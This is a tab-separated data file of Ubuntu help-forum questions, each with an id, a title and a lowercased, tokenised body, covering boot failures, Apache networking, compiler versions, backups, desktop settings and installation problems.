303687	what is ubuntu 's top bar called ?	mac osx and ubuntu have the same type of bar at the top of the screen . what i mean is that it is dynamic , when you launch an application , you can reach its setting by using that top bar , file view and so on is not implemented in the application itself , but it is implemented to that bar . what is this user interface called ?
303694	where is `` startup applications '' user config file for disabled and enabled applications ?	it is the gnome-session-properties command . i know already the apps are at ~/.config/autostart . i know there are files at /etc but those are root . i found nothing at gconf-editor . i need to know where gnome-session-properties stores what apps are disabled and enabled to auto startup , so i can backup that file : ) thx !
303699	installation of ubuntu server 13.04	i have installed ubuntu server 13.04 after installation when i enter the username and the password , nothing happens , still the black screen shows.what should i do ?
303706	new server - apache will not serve outside lan	new server , running well 12.04 lts on hp ml350 . apache = great , inside our lan . apache = timeout , from wan ( nat forwarded from firewall ) . i have cleared all iptables , read & checked every `` allow '' and `` deny '' in http conf file & htaccess file . with iptables logging every packet , destination server sees the packet . rebooted firewall , tested firewall ( all good ) and definitely port forwarding to new server . rebooted server , cleared out iptables , checked all 4 macs , nic cards are good and working . static routing is 100 % correct . at a loss , all other 12.04 lts servers are fine and configured just like this one . any help/pointers appreciated . edit : *local scan : * starting nmap 5.21 ( http : //nmap.org ) at 2013-06-04 22:46 bst nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.00034s latency ) . not shown : 986 closed ports port state service 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 139/tcp open netbios-ssn 143/tcp open imap 443/tcp open https 445/tcp open microsoft-ds 631/tcp open ipp 993/tcp open imaps 995/tcp open pop3s 3306/tcp open mysql nmap done : 1 ip address ( 1 host up ) scanned in 0.06 seconds *from another box inside lan : * nmap 10.0.0.33 starting nmap 6.00 ( http : //nmap.org ) at 2013-06-04 22:47 bst nmap scan report for 10.0.0.33 host is up ( 0.00030s latency ) . not shown : 987 closed ports port state service 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 139/tcp open netbios-ssn 143/tcp open imap 443/tcp open https 445/tcp open microsoft-ds 631/tcp open ipp 993/tcp open imaps 995/tcp open pop3s nmap done : 1 ip address ( 1 host up ) scanned in 0.12 seconds *remote scan : * nmap site1.fqdn -p 30333 starting nmap 5.21 ( http : //nmap.org ) at 2013-06-04 22:53 bst nmap scan report for site1.fqdn ( 82.x.x.x ) host is up ( 0.033s latency ) . rdns record for 82.x.x.x : ptr-x.x.x.82.rev.x.uk port state service 30333/tcp filtered unknown nmap done : 1 ip address ( 1 host up ) scanned in 0.34 seconds the request is : https : /warehouse1.fqdn:30333 this is getting firewall natted to `` 10.0.0.33:443 '' . i am starting to believe this is a hardware issue with the network cards on my lan server , but any guidance appreciated .
303707	how to know where plugged device was mounted ?	for example i have 3g modem . when i plug it in usb port it becomes /dev/ttyacm0 . how can i see if device is really connected at all , what proper commands to see listings of connected devices ( not only on usb port ) ? how to determine which device mounted where , so if i see my modem in listing , how can i find where its mounted in filesystem ?
303709	xubuntu with custom kernel : why is it using configuration from /boot ?	i 've downloaded the latest stable linux kernel source ( 3.9.4 ) , i 'm running xubuntu 13.04 . i 'd like to try to build my own kernel , as i 'm quite comfortable at my hardware . as suggested , i did the following : root @ localhost : /usr/src/linux-3.9.4 # make clean root @ localhost : /usr/src/linux-3.9.4 # make mrproper root @ localhost : /usr/src/linux-3.9.4 # touch .config root @ localhost : /usr/src/linux-3.9.4 # make menuconfig i 'm using touch .config because , without it , it 's using some configuration from /boot . why ?
303711	how to use ubuntu disk on mac	how do i use the dvd i burned to run ubuntu on mac 10.6.8 ? tried `` c '' , then `` option '' at restart and dvd is ejected . i want to run , to take a look , before i install .
303712	disable touchpad switch application ?	when i 'm scrolling sometimes ubuntu will think i 'm trying to switch applications . is there a three finger application switching feature in ubuntu 13.04 that i do n't know about ? it sometimes also switches applications when my palms are touching . i tried disable while typing and it 's not optimal or user friendly .
303720	problem sharing ethernet connection via wifi	i 've an ethernet connection to the internet and i need to share it via wifi with my other mobile devices . i followed up the instructions of setting up a hotspot in ubuntu : i created a new connection via the network manager tool . i setup the security options : wep 128 encryption passphrase . i turned on the hotspot using this new connection . my laptop connected successfully to the hotspot , however it did n't appear when i activated wifi on the other device ( android devices ) . what is the problem ?
303724	does ubuntu support audio ducking ?	does ubuntu support audio ducking for a non-voice over ip program ? again , the program is not voice over ip program , like skype or mumbled . for example if i have a music player on , i want it so that every time i play audio from a text-to-speech program , the volume on the music player automatically is lowered or muted . i guess the muted program may as well be system wide audio , except for the text-to-speech program . i know windows supports voice over ip ducking , but that requires a voice over ip program . my text to speech program obviously is not a voice over ip program , so i was hoping there was a way to enable ducking . here is the audio ducking panel in windows :
303725	virtualbox - how to install os x guest under ubuntu host ?	has anyone managed to install os x guest in virtualbox under ubuntu ? i 've wasted 3 days trying to accomplish this by following various tutorials around the web , but none seem to work for me . can anyone share some experience , or an updated tutorial link for this ? for the record , i 'm running ubuntu 13.04 on acer as5830tg .
303727	green header file	in terminal , when i type ls , i see some header files ( like foo.h ) in green . as far as i know , green corresponds to executable files . so why some of the those header files are in green ?
303731	why is `` rm '' so much slower than deleting files via the file manager ?	i witnessed that deleting directories ( with the size of a couple of gigabytes ) which contain many files is very slow when using rm . it takes up to several minutes ! when deleting the same folder via the file manager , the job is done within a second . ( it takes another second to empty the trash afterwards . ) what is the reason for this ?
303732	how to find out how many hours a drive has been used ?	how can i check how many hours a drive has been used for ? i looked in drive utility but i did n't see it in the smart data . is there a better way or program for this ? thanks
303734	how to replace thunar with pcmanfm	how should i do to replace thunar with pcmanfm in xubuntu ? i have tried but just removing thunar and instaling pcmanfm . and pcmanfm does n't succeed thunar features like integrated with dropbox , starting at startup , my filesystem not appearing on places , etc . thank you
303736	bumblebee indicator icon on unity bar does not show up ubuntu 13.04	i installed and configured bumblebee and the bumblebee indicator once before on ubuntu 13.04 . it worked fine . i had to reinstall and did the exact same thing as before . now the indicator on the `` task bar '' will not show up . even if i start the program from the terminal . no output is given either . is there a dependency that i am missing ? i just do n't know .
303742	trouble finding ubuntu	installation went fine on my old tower pc . i replaced windows xp with ubuntu 12.4 and continued on with the reboot . the trouble is that nothing appears upon start up . dos works through the initial start up but the ubuntu operating system will not turn on . did i miss something ? i thought i followed the step by step process fine . could it be that the address is missing from dos to ubuntu ?
303757	i installed ubuntu 12.04 on my lenovo x220 then upgraded to ubuntu 12.10 blank screen	i installed ubuntu 12.04 on my lenovo x220 then upgraded to ubuntu 12.10 now i get a blank screen after i see the ubuntu logo and the four dots below it . i see my wireless indicator lit as well as my bluetooth indicator lit . nothing else . please help !
303765	windows 8 + ubuntu 13.04 dual boot issue	so i finally cleaned up my drives and installed ubuntu 13.04 which went quite well . i did install it on a different hard drive all together with ext4 and a swap worth of 20gb ( still not 100 % sure on the amount of swap haha ) . everything went smoothly and ubuntu booted fine . grub installed and worked fine as well after previously having problems ( hence why i cleaned up all my drives ) . now i can not boot back into ubuntu , when i click on ubuntu once grub shows up it just gives me a purple screen . i have also lost some drives/partitions in windows it seems . i had a partition dedicated for steam itself . i will explain/show how my drives are setup.. drive 0 : 60gb ssd with windows 8 installed . drive 1 : 1tb hard drive that i believe i had a seperate partition for steam and other assorted games , dont remember sizing though . ubuntu installed here with seperate partitions . drive 2 : 1tb hard drive for downloads etc and a spare partition . ( done in windows ) all drives were labelled 1st , 2nd and 3rd . obviously windows can not see the 2nd drive as that is where ubuntu is installed . back to it.. once i hit windows 8 from grub launcher , it takes me to the standard windows boot which i can hit either ubuntu and run a live cd or go to windows 8 just fine . currently i am using the live cd of ubuntu 13.04 . the last thing i remember doing on ubuntu was changing the ati graphics card drivers to the second option instead of the top one . proprietary i believe it was ? sorry for the essay , i am fairly new to ubuntu/linux : )
303768	how to run phase v2.0 using ubuntu	i wish to use phase v2.0 . i had follow the instruction during installation . however , nothing turn out when i type in command . i always get no such directory or file . anyone can help on this matter ? thank you .
303771	diff between x86_64-linux-gnu-gcc and plain old gcc ?	i 'm trying to compile something called a `` voice cloning toolkit '' for festival and hts . ( see : http : //homepages.inf.ed.ac.uk/jyamagis/software/page37/page37.html ) i 've found that lots of things break with gcc-4.7 , so i downgraded gcc , to 4.6 , like so : sudo apt-get remove gcc-4.7 cpp-4.7 g++-4.7 sudo update-alternatives -- install /usr/bin/gcc gcc /usr/bin/gcc-4.6 50 sudo update-alternatives -- install /usr/bin/g++ g++ /usr/bin/g++-4.6 50 sudo update-alternatives -- install /usr/bin/cpp cpp /usr/bin/cpp-4.6 50 but now i am running into : x86_64-linux-gnu-gcc -pthread -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -fpic -i./portaudio-v19/include/ -i/usr/include/python2.7 -c src/_portaudiomodule.c -o build/temp.linux-x86_64-2.7/src/_portaudiomodule.o -fno-strict-aliasing unable to execute x86_64-linux-gnu-gcc : no such file or directory error : command 'x86_64-linux-gnu-gcc ' failed with exit status 1 make : * [ all ] error 1 apparently , i can apt-get install gcc to restore the x86_64-linux-gnu-gcc program , but then the other htklib stuff wo n't compile ( because installing gcc always gives me the 4.7 version ) . so anyways , what the heck is this x86_64-linux-gnu-gcc command ? can i have it , whilst keeping the gcc-4.6 ?
303772	gparted problem - `` unable to satisfy all constraints on the partition ''	i have a dual-boot system and i wanted to shrink the windows partition to give more space for ubuntu . so using gparted , i was able to properly shrink the windows partition , leaving some unallocated space to be used by the ubuntu partition . then when i was trying to extend the ubuntu partition to include the unallocated space , i get an error from gparted that says `` unable to satisfy all constraints on the partition '' . i have tried basically everything , but i just ca n't make this error message go away . any help would be much appreciated !
303773	what is the difference between the 2013q1 intel linux graphics stack release and xserver-xorg-video-intel ?	webup8 recently posted a description on how to upgrade your intel graphics driver to the `` 2013q1 intel linux graphics stack release '' . i already have xserver-xorg-video-intel installed from the main raring repositories . what is the difference between the two packages ?
303775	envy 15 beats audio issues w 13.04	what i have and a map of the speakers : the model : hp envy 15 3040nr what this does not show is that there are actually 4 speakers in the front so in summary there are 6.1 speakers : two on the front left two on the front right two above the keyboard a sub on the bottom the laptop the problem : audio only comes out of the front , and i 'm not sure if it 's all four or two of the four . i ca n't figure out what to do software wise , being a complete noob to ubuntu/linux , but i got that alsa thing if anybody wants to take a crack at it .
303778	taskbar and tray on lubuntu gone missing but not on guest account	i 'm using lubuntu 13.04 , and something strange happened . i rebooted after installing some updates , and now when i choose `` lubuntu '' on the login screen , i get something similar to `` openbox '' -- no taskbar/tray -- just a right-click context menu for handling tasks . right now i am posting this using `` lubuntu ( netbook ) '' . how can i get my taskbar and tray back ? ? ? does it have something to do with openbox configuration ? thanks for your replies ahead of time ! : )
303785	how to enable two tap for right-click using openbox on xubuntu	# # detect and configure touchpad . see 'man synclient ' for more info . if egrep -iq 'touchpad ' /proc/bus/input/devices ; then synclient vertedgescroll=1 & synclient tapbutton1=1 & in above is autostart.sh config for my touchpad . how should i do to enable two tap for right-clicking ?
303786	trouble getting tightvnc to display screen	whenever i open a tightvnc client on my ubuntu box , i get this : what might cause what i 'm seeing here ?
303788	upgrade did not complete successfully	the upgrade from 10.04 to 12.04 was interrupted prior to completion . what can i do to get my ubuntu operating system working again .
303791	recent 12.04 update causes boot failure	a june 03 2013 routine update of my system appears to be causing my ubuntu 12.04 to no longer boot . i 've tried installing the binary nvidia drivers , since this has caused problems for me before , but it appears to have another source . here is my boot.log from /var/log . the process actually hangs wherein i am forced to reboot . i 'm guessing it hangs somewhere after the vmware stuff fails . i have no idea why it needs to launch vmware during boot . fsck from util-linux 2.20.1 /dev/sda3 : clean , 996914/5373952 files , 9550102/21484929 blocks modem-manager [ 953 ] : < info > modemmanager ( version 0.5.2.0 ) starting ... modem-manager [ 953 ] : < info > loaded plugin gobi modem-manager [ 953 ] : < info > loaded plugin nokia modem-manager [ 953 ] : < info > loaded plugin wavecom modem-manager [ 953 ] : < info > loaded plugin option modem-manager [ 953 ] : < info > loaded plugin anydata modem-manager [ 953 ] : < info > loaded plugin generic modem-manager [ 953 ] : < info > loaded plugin motoc modem-manager [ 953 ] : < info > loaded plugin zte modem-manager [ 953 ] : < info > loaded plugin sierra modem-manager [ 953 ] : < info > loaded plugin option high-speed modem-manager [ 953 ] : < info > loaded plugin x22x modem-manager [ 953 ] : < info > loaded plugin samsung modem-manager [ 953 ] : < info > loaded plugin huawei modem-manager [ 953 ] : < info > loaded plugin linktop modem-manager [ 953 ] : < info > loaded plugin longcheer modem-manager [ 953 ] : < info > loaded plugin simtech modem-manager [ 953 ] : < info > loaded plugin novatel modem-manager [ 953 ] : < info > loaded plugin ericsson mbm * starting mdns/dns-sd daemon [ 74g [ ok ] * stopping userspace bootsplash [ 74g [ ok ] skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting apparmor profiles [ 128g [ 122g [ ok ] * stopping system v initialisation compatibility [ 74g [ ok ] * starting system v runlevel compatibility [ 74g [ ok ] * starting gnome display manager [ 74g [ ok ] * starting save kernel messages [ 74g [ ok ] * starting anac ( h ) ronistic cron [ 74g [ ok ] * starting acpi daemon [ 74g [ ok ] * starting cpu interrupts balancing daemon [ 74g [ ok ] * stopping gnome display manager [ 74g [ ok ] * starting crash report submission daemon [ 74g [ ok ] * starting automatic crash report generation [ 74g [ ok ] * starting regular background program processing daemon [ 74g [ ok ] * starting deferred execution scheduler [ 74g [ ok ] * stopping anac ( h ) ronistic cron [ 74g [ ok ] * stopping save kernel messages [ 74g [ ok ] starting vmware services : virtual machine monitor [ 71gfailed virtual machine communication interface [ 71gfailed vm communication interface socket family [ 71gfailed blocking file system [ 71g done virtual ethernet [ 71gfailed vmware authentication daemon [ 71g done speech-dispatcher disabled ; edit /etc/default/speech-dispatcher raising maximum number of filedescriptors ( ulimit -n ) to 32768 . starting tor daemon : tor ... jun 03 20:14:33.272 [ notice ] tor v0.2.2.35 ( git-73ff13ab3cc9570d ) . this is experimental software . do not rely on it for strong anonymity . ( running on linux x86_64 ) jun 03 20:14:33.272 [ notice ] initialized libevent version 2.0.16-stable using method epoll . good . jun 03 20:14:33.272 [ notice ] opening socks listener on 127.0.0.1:9050 jun 03 20:14:33.273 [ notice ] opening control listener on /var/run/tor/control done . * starting the winbind daemon winbind [ 128g [ 122g [ ok ] saned disabled ; edit /etc/default/saned apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername * starting web server apache2 [ 128g [ 122g [ ok ] * starting anac ( h ) ronistic cron [ 74g [ ok ] * stopping anac ( h ) ronistic cron [ 74g [ ok ] * checking battery state ... [ 128g [ 122g [ ok ] * stopping system v runlevel compatibility [ 74g [ ok ] * starting cups printing spooler/server [ 74g [ ok ] * starting netbios name server [ 74g [ ok ] * starting mount network filesystems [ 74g [ ok ] * stopping mount network filesystems [ 74g [ ok ] * starting emergency keypress handling [ 74g [ ok ] acpid : exiting * stopping bridge socket events into upstart [ 74g [ ok ] * stopping smb/cifs file server [ 74g [ ok ] * stopping openssh server [ 74g [ ok ] * stopping system logging daemon [ 74g [ ok ] * stopping acpi daemon [ 74g [ ok ] * stopping cpu interrupts balancing daemon [ 74g [ ok ] * stopping regular background program processing daemon [ 74g [ ok ] * stopping deferred execution scheduler [ 74g [ ok ] * stopping netbios name server [ 74g [ ok ] * stopping automatic crash report generation [ 74g [ ok ] * stopping initialize or finalize resolvconf [ 74g [ ok ] * stopping emergency keypress handling [ 74g [ ok ] * starting system v runlevel compatibility [ 74g [ ok ] * starting save system clock to hardware clock [ 74g [ ok ] * starting save sound card ( s ' ) mixer state ( s ) [ 74g [ ok ] * stopping save sound card ( s ' ) mixer state ( s ) [ 74g [ ok ] * stopping save system clock to hardware clock [ 74g [ ok ] stopping vmware services : vmware authentication daemon [ 71g done vm communication interface socket family * stopping device node and kernel event manager [ 74g [ ok ] * stopping bridge udev events into upstart [ 74g [ ok ] * stopping crash report submission daemon [ 74g [ ok ] [ 71g done virtual machine communication interface [ 71g done virtual machine monitor [ 71g done blocking file system * starting emergency keypress handling [ 74g [ ok ] * stopping emergency keypress handling [ 74g [ ok ] * starting save system clock to hardware clock [ 74g [ ok ] * starting store software rfkill state [ 74g [ ok ] * starting save sound card ( s ' ) mixer state ( s ) [ 74g [ ok ] * stopping store software rfkill state [ 74g [ ok ] * stopping save sound card ( s ' ) mixer state ( s ) [ 74g [ ok ] * starting emergency keypress handling [ 74g [ ok ] * stopping emergency keypress handling [ 74g [ ok ] * starting store software rfkill state [ 74g [ ok ] * starting save sound card ( s ' ) mixer state ( s ) [ 74g [ ok ] * stopping store software rfkill state [ 74g [ ok ] * starting emergency keypress handling [ 74g [ ok ] * stopping emergency keypress handling [ 74g [ ok ] * starting store software rfkill state [ 74g [ ok ] * stopping store software rfkill state [ 74g [ ok ] [ 71g done * starting emergency keypress handling [ 74g [ ok ] * stopping emergency keypress handling [ 74g [ ok ] * starting store software rfkill state [ 74g [ ok ] * stopping store software rfkill state [ 74g [ ok ] * stopping save sound card ( s ' ) mixer state ( s ) [ 74g [ ok ] * starting emergency keypress handling [ 74g [ ok ] * stopping emergency keypress handling [ 74g [ ok ] * starting store software rfkill state [ 74g [ ok ] * starting save sound card ( s ' ) mixer state ( s ) [ 74g [ ok ] * stopping store software rfkill state [ 74g [ ok ] * stopping save sound card ( s ' ) mixer state ( s ) [ 74g [ ok ] apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername * stopping cups printing spooler/server [ 74g [ ok ] ... waiting * stopping save system clock to hardware clock [ 74g [ ok ] . * stopping web server apache2 [ 128g [ 122g [ ok ] speech-dispatcher disabled ; edit /etc/default/speech-dispatcher stopping tor daemon : tor . * stopping the winbind daemon winbind [ 128g [ 122g [ ok ] [ 33m* [ 39 ; 49m no vpn is running . checking for running unattended-upgrades : * asking all remaining processes to terminate ... [ 128g [ 122g [ ok ] * all processes ended within 2 seconds ... . [ 128g [ 122g [ ok ] * stopping bluetooth daemon [ 74g [ ok ] * stopping mdns/dns-sd daemon [ 74g [ ok ] * stopping network connection manager [ 74g [ ok ] nm-dispatcher.action : caught signal 15 , shutting down ... modem-manager [ 953 ] : < info > caught signal 15 , shutting down ... * deconfiguring network interfaces ... [ 128g [ 122g [ ok ] * deactivating swap ... [ 128g [ 122g [ ok ] mount : / is busy * will now restart
303793	backup regimen - is this plan any good ?	i have a desktop that has some valuable personal and financial records , photos , etc . i installed a second drive formatted ext3 called 'internalbackup ' . i 've been using a variety of backup programs , and none have really been what i wanted . i 'd like a copy of the current user 's ( wife 's ) home folder backed up in a simple way , so that someone who is n't me ( the non-technical wife ) could find everything important using just a file browser should that ever become necessary . disk space is not a problem . using 'scheduled tasks ' from the repository , i created a cron job : rsync -a -- delete ~/ /internalbackup/daily.backup & > /dev/null 2 > & 1 rsync -a -- delete /internalbackup/daily.backup /internalbackup/weekly.backup & > /dev/null 2 > & 1 rsync -a -- delete /internalbackup/weekly.backup /internalbackup/monthly.backup & > /dev/null 2 > & 1 the daily runs every morning at 0400 . the weekly runs mondays at 0200 . the monthly runs the last day of the month at 0000 . wasted time is of no consequence because it only really happens in the middle of the night .
303795	run typical sudo commands from button on unity	i tend to find myself opening terminal sessions to run sudo commands and was wanting to make something more useful as an application . using some information from various online sources https : //help.ubuntu.com/community/unitylaunchersanddesktopfiles i came up with my little desktop application . start by installing desktop shortcuts sudo apt-get install -- no-install-recommends gnome-panel then run gnome-desktop-item-edit -- create-new ~/desktop create a basic launcher desktop shortcut . now create a new terminal profile called stayopen open terminal , select file - new profile , create new call the new profile `` stayopen '' . then under properties select the tab for title and command . at the bottom of this tab select when command exits - hold the terminal open once your default desktop file is created you will want to edit it . example below : gedit < your file name > example : my below desktop file script is named `` sudo run '' . if you are copy/pasting the script below , you will want to account for that with my file below or it will not run properly . [ desktop entry ] version=1.0 type=application name=sudo run icon=gdm-xnest.png exec=gnome-terminal terminal=false actions=terminal ; terminalroot ; files ; textedit ; update [ desktop action terminal ] name=terminal exec=gnome-terminal -- window-with-profile=stayopen onlyshowin=unity ; [ desktop action terminalroot ] name=terminal root exec=gnome-terminal -- window-with-profile=stayopen -x bash -l -c `` sudo su ; bash '' onlyshowin=unity ; [ desktop action files ] name=sudo files exec=gnome-terminal -- window-with-profile=stayopen -- geometry=40x2+1+1 -x bash -l -c `` sudo nautilus ; bash '' onlyshowin=unity ; [ desktop action textedit ] name=sudo text edit exec=gnome-terminal -- window-with-profile=stayopen -- geometry=40x2+1+1 -x bash -l -c `` sudo gedit ; bash '' onlyshowin=unity ; [ desktop action update ] name=sudo apt-get update exec=gnome-terminal -- window-with-profile=stayopen -x bash -l -c `` sudo apt-get update & & sudo apt-get upgrade ; bash '' onlyshowin=unity ; once complete move file to applications folder , and can be treated as an application . sudo nautilus move file to usr/share/applications then drag drop to unity launcher if desired . here is where the bash script becomes useful . once the desktop link is on the unity launcher you will have several right click options as listed below in actions . note the corresponding actions at the bottom of the file . several of the bash scripts open a small terminal window just large enough to type in your sudo password . modify the `` geometry= '' to your preference or remove if desired . once the password is typed in you get your application running , etc . you can change the actions to sort in your preference and set the default `` exec= '' to your left click preference as well one of the great features of this as a shortcut on your unity launcher is the right click `` quit '' function which will close all open windows . -mb : edited to improve readability
303796	permission denied to copy or paste files in the system folders	problem statement : well i have installed xampp 1.8.1 in my ubuntu 13.04 64 bit system . but i could n't paste my web files to the /opt/lampp directory where lampp is installed . as i try to paste my web files to that directory the paste option is greyed out . and while i try pasting with ctrl + v command the 'permission denied ' error occurs . help me out as i am a noobhead in this linux world !
303800	shutdown slow in 13.04 , hangs on shutting down processes	i believe this problem has existed since i upgraded to 13.04 . i have an ssd , so differences in boot/shutdown times are very noticeable . it used to take a couple of seconds to shut down - now , it takes several more . i can press esc and view the shutdown procedures , which seems to hang a long time on 'asking remaining processes to terminate ' before failing and killing them . now it takes several more seconds . is there any way i can fix this problem , or at least find out which process ( es ) is/are refusing to terminate ?
303808	how exactly package dependencies works ?	how exactly package dependencies works when we are transferring packages from one pc to other ? is there anything else that influence on package dependencies ? how exactly computer architecture matters for package dependency ? after my small research on google , i found it dependent on 1 ) os versions 2 ) computer architecture ( *86 bit os system packages wo n't work on 62 bit os vice versa )
303810	after changing the root password , why does my user sudo login is failing ?	change the root password . try to execute the command with sudo , it fails to execute with new root password . is there any command we need to run , after changing the root password , in order to sudo to work .
303812	installing ubuntu in old system	so i have a very old system , the specification is like below . amd sempron le-1100 1.9 ghz ( single core ) 1gb ram s3 unichrome pro igp 64mb shared memory 160 gb hdd please suggest me which ubuntu destro will work without any problem & smooth last night i installed ubuntu in my laptop which is high end system & i liked the taste of ubuntu that is why i want to install it in my old pc i know pc is very old and outdated but want to try it atleast once . thanks .
303813	how do i remove xp without disturbing lubuntu ?	i have a dual booted windows xp and lubuntu . i have downloaded lubuntu through wubi . in order to speed the computer up , i have decided to remove xp . the thing is , i do n't want to disturb lubuntu 12.04 . in other words , is there any way to remove the xp partition . if possible , please provide the proper , accurate steps on how to do so . and if possible , please specify how to increase the partition space of my lubuntu , which is now currently 31.1gb big . thank you in advance .
303818	samba is not working on ubuntu 13.04 ?	i tried installing samba from ubuntu software centre and from command line after installing . when i tried opening it is now showing in the application launcher or now working through command line . any help
303824	mouse click no more responsive	i am happily using ubuntu since the 11.04 release on a dell latitude e5530 . unfortunately since i bought this laptop i am encountering some troubles with the mouse ( i guess related to the x server ) and these problems are more and more frequent with the last 13.04 release . my configuration is the following one : ubuntu 13.04 usb mouse ( microsoft ) plugged in gnome shell touchpad gnome shell extension , to disable the track pad when the mouse is plugged sometimes ( once , twice , more , a day ) my mouse clicks are no more available almost every where . i can just click for windows selection in gnome shell , but once in an application , clicks are no more available . unplugging the mouse let me use the trackpad again , but the same problem is still there : i ca n't click with the trackpad . plugin the mouse into another usb port does n't change anything . the only solution is to restart the x server , which not always acceptable . are any other ubuntu users encountering the same issue ? where does this can come from , and how can i solve it ? many thanks for any inputs , advises !
303830	no unity 3d in virtualbox	i 'm having trouble running unity 3d in ubuntu 12.04 lts in virtualbox . i tried enabling 3d acceleration , it still does not show 3d . only 2d . i tried installing vbox guest additions , wo n't show 3d . the ubuntu live cd session : no 3d .
303831	user recognizes command but root does n't	i installed arm-linux-g++ and added its directory to path and it recognizes the command . but when i try it with sudo it says command not found . i even tried adding its directory to bashrc -- root but still nothing changed . how can i fix it ?
303832	ubuntu 12.04.1 lts installation problem on hp dreamscreen	hi friends , i am new to linux ( ubuntu ) . i have tried installing ubuntu 12.04.1 lts on a hp dreamscreen using a usb-stick . unfortunately i had many problems like grub install fail , even if i install grub manually , a blank screen with a blinking cursor was only visible thing on screen . my machine info intel atom d525 1.8 ghz processor , intel nm10 express chipset,2 gb ddr3 ram,250 gb sata ii ( 7200 rpm ) . my question is , i have downloaded ubuntu-12.04.1-desktop-amd64.iso file , is this compatible with my machine ? i have been trying for a week to install ubuntu . i have read many forums and referred to many web sites , many of these teach how to install along side of windows but i want only ubuntu to be installed on my machine . please , if you have any detailed solutions how to install ubuntu , that could help me , i would be very grateful to hear them .
303834	choose a font among all possible and install it	i do not want to install all the fonts available in the ubuntu repositories . instead , i want to look at them and to click one ( or more ) to be installed . some softwares : fontinstall seems to be unmaintained and i did not see the license gnome-font-viewer displays only the already installed fonts synaptic : does not display the fonts , does not indicate the family font and the category fonts is not always respected . fontmatrix does not seems to display fonts from repository what is your favorite way to handle font selection/installation ? is there an up-to-date page on the net explaining this issue ?
303842	how to play an mp3 ( many tracks in one file ) with cue file attatched to it	what player supports listening to long mp3 files with tracks information in a separate *.cue file ? tried deadbeef v. 0.5.5 , but no luck . it only supports lossless disc images like flac or avi , as far as i understood .
303844	how do i either make ubuntu my default os at start up without having to choose ? or , how do i delete my old operating system ? which option is better ?	i just installed ubuntu . it did not prompt me to remove the old operating system when i installed ubuntu . how do i either make ubuntu my default os at start up without having to choose ? or , how do i delete my old operating system ? which option is better ?
303849	create a single pdf from multiple text , images or pdf files	i have a bunch of text files , images and pdf files which i want to convert into a single pdf file . how do i do it ?
303859	how to extract a record in a text on string match in a file using bash	hi i have a text file sample.txt as =====record1 title : javabook price : $ 120 author : john path : d : =====record2 title : .netbook author : paul path : f : =====record3 author : john title : phpbook subject : php path : f : price : $ 150 =====record4 title : phpbook subject : php path : f : price : $ 150 from this i want to split the data based on author , it should split into 2 files which contains test1.txt =====record1 title : javabook price : $ 120 author : john path : d : =====record3 author : john title : phpbook subject : php path : f : price : $ 150 and test2.txt =====record2 title : .netbook author : paul path : f : like above i want to classify the main sample.txt file into sub files based on author field dynamically . please suggest me a way to do it .
303861	ubuntu 13.04 stuck on the home screen and not able to display any wallpapers and have problem closing down the appplications	i upgraded from 12.04 to 12.10 then on the same day to 13.04 . the up-gradation happened successfully from 12.04 to 12.10 but while from 12.10 to 13.04 everything happened fine until the system got restarted . unity is gone as well as not able to make any changes in the wallpaper , also most of the times the application gets stuck when i try to close it down . trying to get icons display but am not able to . tried using system settings but to no avail . referred to the article unity does not start in ubuntu 13.04 . but no changes in the system . compiz is also not being very useful and does not do anything now . need help . thanks in advance for your thoughts . my systems configuration - core i5 2320 3.00 ghz 64 bits architecture
303863	which version of ubuntu is recommened for samsung nb r519	while i use usb stick with ubuntu-12.04.2-desktop-amd64.iso for samsung nb r519 . after it runs a while , the installation stopped with an error message `` ( initramfs ) unable to find a medium containing a live file system '' does this nb not suitable to install ubuntu 12.04 ?
303869	ubuntu server 13.04 on ibm x3300 m4 - boot failure	i installed ubuntu server 13.04 on an ibm x3300 m4 system . everything was fine during the installation , and all the required updates were done automatically , but when the installation was completed and the system reboot was done , the system totally can not boot up . the system keeps on rebooting and giving the following boot failure message : boot failed cd/dvd rom boot failed hd disk 0 and so on for all the devices listed .
303870	format asus external hard drive an300	i am trying to format a new external hdd of asus ( model an300 ) . ubuntu recognizes only a `` cd rom '' when i plug it to the computer , names asus webstorage . i tried to follow instructions , on this link . but when i type fdisk -l on my laptop i do n't get any line , so i do n't know if and where the hdd is mounted . i also tried this . but nothing work for my hdd , how can we beat the system ?
303871	configure : error : failed to find required module libxml2 , while building mesa	when executing ./configure command for mesa-9.1.3 i get the following error : checking python2 module : libxml2 ... no configure : error : failed to find required module libxml2 when i already have libxml2 installed , and on executing apt-get install libxml2 : libxml2 is already the newest version .
303877	pulse audio volume control	having some trouble with pulse audio volume control . when run it , i get the error message you can see in the window in the screen shot below . however when i run start-pulseaudio-x11 in the terminal , you can see the output is `` unknown job '' . does anybody know what i could do to get pulse audio volume control working again ? thanks !
303878	install wine on ubuntu 13.04 running from a live usb ?	i tried to install wine on my ubuntu 13.04 setup ( running from a live usb ) . i desperately need wine installed as quickly as possible as my laptop has a mbr problem that i have to fix and the only way i can see that i can fix it is using a tool which only runs on windows . i also have some issues with installing ubuntu 13.04 from my usb ( i think it is a problem with the hard drive or something ) . so my main question is can one install wine on ubuntu as a live session from a usb ? i get the following errors when trying to install wine from the ubuntu software centre . the following packages have unmet dependencies : wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.10ubuntu1 is to be installed depends : libc6 ( > = 2.14 ) but 2.17-0ubuntu5 is to be installed depends : wine1.4-amd64 ( = 1.4.1-0ubuntu5 ) but 1.4.1-0ubuntu5 is to be installed depends : wine1.4-i386 ( = 1.4.1-0ubuntu5 ) but it is not going to be installed thank you for any responses .
